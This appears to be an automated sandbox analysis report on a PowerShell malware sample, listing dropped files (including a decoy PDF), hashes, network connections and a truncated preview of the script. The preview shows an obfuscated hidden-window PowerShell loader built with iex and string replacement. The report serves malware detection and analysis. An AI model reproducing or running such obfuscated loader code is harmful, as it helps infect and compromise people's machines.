                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppnahuff.l2a.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qspzcx0m.yll.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2appjjt.bjc.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 08-14-25-289.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                  Category:dropped
                                                                                  Size (bytes):16525
                                                                                  Entropy (8bit):5.386483451061953
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                  MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                  SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                  SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                  SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                  Malicious:false
                                                                                  Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):15114
                                                                                  Entropy (8bit):5.347393506755955
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:0QkB0kVYbJFUu99pUKC02vMxfEXwJwUJB+F5vTfg/gq/mcU1du/Sz4zKrsyRcV1O:Nzq
                                                                                  MD5:AD3E68BC1029549526C09BCFC02E10A2
                                                                                  SHA1:66733262830C9CF149202C8D3FA55855F343E671
                                                                                  SHA-256:354BC7E6EC781C463AF04AC941482F41222A5C01E8C03FCAF3BBB6CDFEA7C628
                                                                                  SHA-512:10F05299D2ED8004379547E953E982E96EB5DC00D41DB1B17D6648546D1D2EBAA5F242896182EE5268A66352E663CDFF99C667559302E1D41DBCBB27B4FEA6AE
                                                                                  Malicious:false
                                                                                  Preview:SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:320-0500 ThreadID=1660 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35721
                                                                                  Entropy (8bit):5.413595610646178
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRi:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRE
                                                                                  MD5:0A4FB9F23010B5FBE3C169D55BB03984
                                                                                  SHA1:360B5726E66A81C088F06C4D7573B703C36F41FD
                                                                                  SHA-256:1EDF34FB344D0AF2ED1FB482A1B878382C99582FBD029B2AC9E0961E023FD6E9
                                                                                  SHA-512:86C1B3CD5464E7B1FE368F4AA9D7D4F77B5A76EF8E5870257724E9CB314728258F70AE5F4BA4835B9C806870ECF785F13586188EBC9DDC2B6A819A75BEC2F01F
                                                                                  Malicious:false
                                                                                  Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\26b529d0-a266-4d34-a4e6-abc416f67926.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                  Category:dropped
                                                                                  Size (bytes):1419751
                                                                                  Entropy (8bit):7.976496077007677
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/xA7owWLkwYIGNPglGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGYGZN3mlind9i4ufFXpAXkru
                                                                                  MD5:70AD54396BBB59F17F819EA2E17952E3
                                                                                  SHA1:12F953092D5E5FA47A59B691FEBC5DD99BE05E51
                                                                                  SHA-256:268E6A1F174E08A9A7C8DFC493EA378369D69B5C2BBDD38E0E422009B574E488
                                                                                  SHA-512:5DE36F3081054B7B98C99B193978CCE32188CAE933CA4B73A6ECF29D04A3FF69FD3B329884F3609C6274B4A5934900901989B55A176EC2A64004A54713B7A623
                                                                                  Malicious:false
                                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\66e190a8-0012-4c4f-bc01-01898f5cc7c9.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                  Category:dropped
                                                                                  Size (bytes):386528
                                                                                  Entropy (8bit):7.9736851559892425
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                  Malicious:false
                                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\bcc89985-2edf-49b9-a774-dd0cbfa83e28.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                  Category:dropped
                                                                                  Size (bytes):758601
                                                                                  Entropy (8bit):7.98639316555857
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                  MD5:3A49135134665364308390AC398006F1
                                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                  Malicious:false
                                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\fe835c1b-d124-49c1-8b4c-7d00d38471e5.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                  Category:dropped
                                                                                  Size (bytes):1407294
                                                                                  Entropy (8bit):7.97605879016224
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLrGZkYYIGNPpe:JVB3mlind9i4ufFXpAXkrfUs0jWLrGZR
                                                                                  MD5:B3D1B54366754A70AE6AA907F2D4B6F5
                                                                                  SHA1:DACAEE18CCFB0BC5757E6E6B8A5CE301E69EDFE4
                                                                                  SHA-256:355E2A370061490E2B526E53E817359BB11294BE637448AB7E29D00DF2D8D6BE
                                                                                  SHA-512:FD9DD45BA7B4D87D5162D01621A4656B3682719117F50C422643C9151063A5ED12031D7624967DD84D4545198CBBA1AC4A04C6E8B0BCD205085FB0FF0B156E49
                                                                                  Malicious:false
                                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7457600993665294
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:zD2P7kmw2CAU20iFukvhkvklCywUeF+Sl6NSogZocJiJa+F+SllNSogZocJiJO1:2P75w2CprtkvhkvCCt3F+S9HgF+SUHP
                                                                                  MD5:1F6101B436B0F496B6E88930B8C9FDCC
                                                                                  SHA1:3FE3ABB11D23CFCE73DABE48A548AFD7554F01B4
                                                                                  SHA-256:784A32C5A90FEEC137AEB81D49A5F7BC089D64D0E83787B182EC8DA1642C8E70
                                                                                  SHA-512:C320DF80F8C44F40F76A3E1E106A7FBC33FB037B6097C61417912340291418FFB5AF65CFC80D815B26A17ADB05A20A03765CE755273AF3B21802F9D4522D4B69
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_...b..U.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....V.P.R..3..U.R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.]..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW.=.Y.]..........................Jc..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.]..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.]...........................j(.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.]....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.]....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.]....9...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J98NRZNQ68YJV7W9ALVO.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7457600993665294
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:zD2P7kmw2CAU20iFukvhkvklCywUeF+Sl6NSogZocJiJa+F+SllNSogZocJiJO1:2P75w2CprtkvhkvCCt3F+S9HgF+SUHP
                                                                                  MD5:1F6101B436B0F496B6E88930B8C9FDCC
                                                                                  SHA1:3FE3ABB11D23CFCE73DABE48A548AFD7554F01B4
                                                                                  SHA-256:784A32C5A90FEEC137AEB81D49A5F7BC089D64D0E83787B182EC8DA1642C8E70
                                                                                  SHA-512:C320DF80F8C44F40F76A3E1E106A7FBC33FB037B6097C61417912340291418FFB5AF65CFC80D815B26A17ADB05A20A03765CE755273AF3B21802F9D4522D4B69
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_...b..U.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....V.P.R..3..U.R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.]..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW.=.Y.]..........................Jc..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.]..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.]...........................j(.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.]....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.]....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.]....9...........

                                                                                  C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                  Category:dropped
                                                                                  Size (bytes):871324
                                                                                  Entropy (8bit):7.827941732382635
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                  MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                  SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                  SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                  SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                  Malicious:false
                                                                                  Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with very long lines (841), with no line terminators
                                                                                  Entropy (8bit):5.330726687403697
                                                                                  TrID:
                                                                                    File name:2rTi9MgX25.ps1
                                                                                    File size:841 bytes
                                                                                    MD5:28e4d353dd649e9252cb62d9be6fb391
                                                                                    SHA1:16ecf4dcec8d1bdf466de38daf89b4d39af55834
                                                                                    SHA256:89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf
                                                                                    SHA512:746ceb99d14517d57866f581856cc901626c52b31c24fc5b309f08897cd919b985c88a81e5e1da046df5998722bd04ed53a8b8ad1785b91fbffb16912730c39d
                                                                                    SSDEEP:24:X98IVyjVjWIPqcz/LYBQWAa6KzEp9zo2m:xSVKIPqZcKzgdor
                                                                                    TLSH:BE0152CA6E4651E76F00E99128C095393635C806A8D600F1F2B8421335ACE3C0DC2B6A
                                                                                    File Content Preview:powershell -win hidden $kilo4z=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\f2iuzg.vb')));$flol=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\iys.vb')));function getit([strin

                                                                                    File Icon

                                                                                    Icon Hash:3270d6baae77db44

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 19, 2024 12:44:28.650613070 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:28.650666952 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:28.650799990 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:28.660104036 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:28.660130024 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:29.911691904 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:29.911792994 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:29.914725065 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:29.914743900 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:29.915123940 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:29.921435118 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:29.967331886 CET44349712107.161.23.150192.168.2.7
